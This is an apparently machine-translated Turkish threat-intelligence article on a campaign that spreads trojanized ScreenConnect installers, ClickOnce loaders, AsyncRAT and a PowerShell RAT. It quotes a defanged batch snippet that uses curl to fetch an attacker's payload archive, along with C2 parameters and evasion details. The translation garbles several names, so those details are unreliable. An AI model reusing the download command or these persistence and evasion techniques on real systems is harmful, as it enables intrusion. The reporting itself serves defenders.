Sofistike bir siber kampanya, ABD tabanlı organizasyonları, Truva Azaltılmış Connectwise ScreAnconnect yükleyicileri aracılığıyla hedeflemeyi ve uzaktan izleme ve yönetim (RMM) aracı kötüye kullanımında önemli bir evrimi işaretleyerek ortaya çıktı.
Mart 2025’ten bu yana, bu saldırılar artan sıklık ve teknik gelişmişlik göstermiştir ve kurumsal ağlarda kalıcı dayanaklar oluşturmak için meşru idari yazılımlardan yararlanmıştır.
Kampanya, aldatıcı sosyal mühendislik taktikleri kullanıyor ve “Secight_support-PDF gibi resmi belgeler olarak gizlenmiş kötü amaçlı kurulumcular dağıtıyor[.]Müşteri[.]exe ”ve“ social_security_statement_documents_386267[.]exe.”
Bu dosyalar meşru destek materyalleri veya finansal belgeler gibi görünmektedir ve başlangıç sistem erişimi elde etmek için kullanıcı güvenini kullanır.
Kurulumcular yürütüldükten sonra, saldırgan kontrollü sunucularla bağlantılar kurar ve kurban makinelerini etkili bir şekilde uzaktan erişilebilir varlıklara dönüştürür.
Bu kampanyayı önceki ScreAnconnect istismarından ayıran şey, geleneksel tam kurulumcular yerine Clickonce Runner yükleyicilerinin konuşlandırılmasıdır.
Acronis araştırmacıları, bu gelişmiş yükleyicilerin gömülü yapılandırma verilerinden yoksun olduğunu, bunun yerine bileşenleri ve ayarları uzatılmış altyapıdan çalışma zamanında getirdiğini belirlediler.
Bu mimari değişim, şüpheli gömülü konfigürasyonların tanımlanmasına dayanan geleneksel statik analiz yöntemleri etkisiz hale geldiğinden, tespit çabalarını önemli ölçüde karmaşıklaştırmaktadır.
Tehdit oyuncusu, tehlike altına alınmış sistemlere aynı anda birden fazla uzaktan erişim truva atlarını (sıçanlar) dağıtarak dikkate değer operasyonel karmaşıklık gösterir.
ScreAnconnect kurulumunun birkaç dakika içinde, otomatik işlemler hem iyi belgelenmiş asyncrat hem de bu kampanyalar için özel olarak geliştirilen özel bir PowerShell tabanlı sıçan kullanır.
Bu çift dağıtım stratejisi, birden fazla tehdit grubu arasında fazlalık planlaması veya paylaşılan altyapı önermektedir.
Gelişmiş enfeksiyon zinciri analizi
Bu kampanyanın teknik karmaşıklığı, çok aşamalı enfeksiyon sürecinin incelenmesi ile belirginleşir.
.webp)
İlk Clickonce yükleyicisi, “E = Destek & Y = Misafir ve H = Morco gibi parametreleri kullanarak saldırgan altyapısına bağlanır[.]yırtıcı kimse[.]Net & P = 8041, ”uzlaşmış sanal özel sunucularda barındırılan komut ve kontrol sunucuları ile iletişim kurma.
Başarılı kurulumun ardından, kötü amaçlı yazılım, ScreAnconnect’in yerleşik otomasyon özelliklerinden yararlanır ve “Bypaasaupdate[.]Yarasa. “
Bu başlangıç yükü, çoklu kodlanmış bileşenleri içeren sıkıştırılmış bir arşiv alarak sofistike bir indirici olarak işlev görür:-
set LINK = https[:]//guilloton[.]fr/x[.]zip
set ZIP_PATH = %ProgramData% \ali[.]zip
curl - s - o "%ZIP_PATH%" %LINK%İndirilen arşiv, “1 arasında” stratejik olarak adlandırılmış dosyalar içerir.[.]TXT ”(Asycraat tarafından devam ediyor),“ Pee[.]TXT ”(AMSI Bypass mekanizmaları) ve“ Skype[.]PS1 ”(PowerShell yürütme komut dosyası).
Bu adlandırma sözleşmesi, imza tabanlı algılama sistemlerinden kaçınmak için tasarlanmış kasıtlı şaşkınlığı temsil eder.
Kalıcılık mekanizması, yinelenen örnekleri önlemek için Mutex kontrolünü uygularken her dakika yürütülen planlanmış görevler oluşturarak belirli bir yaratıcılığı gösterir.
PowerShell Script “Skype[.]PS1 ”Yükler .NET düzeneklerini doğrudan belleğe kodlayarak, tehdit aktörleri için sürekli sistem erişimini sürdürürken geleneksel dosya tabanlı algılama yöntemlerini atlar.
Bu kampanya, kalıcı organizasyonel erişim sağlamak için meşru yazılım istismarını sofistike kaçaklama teknikleriyle birleştiren RMM aracı silahlandırmasında ilgili bir evrimi temsil etmektedir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.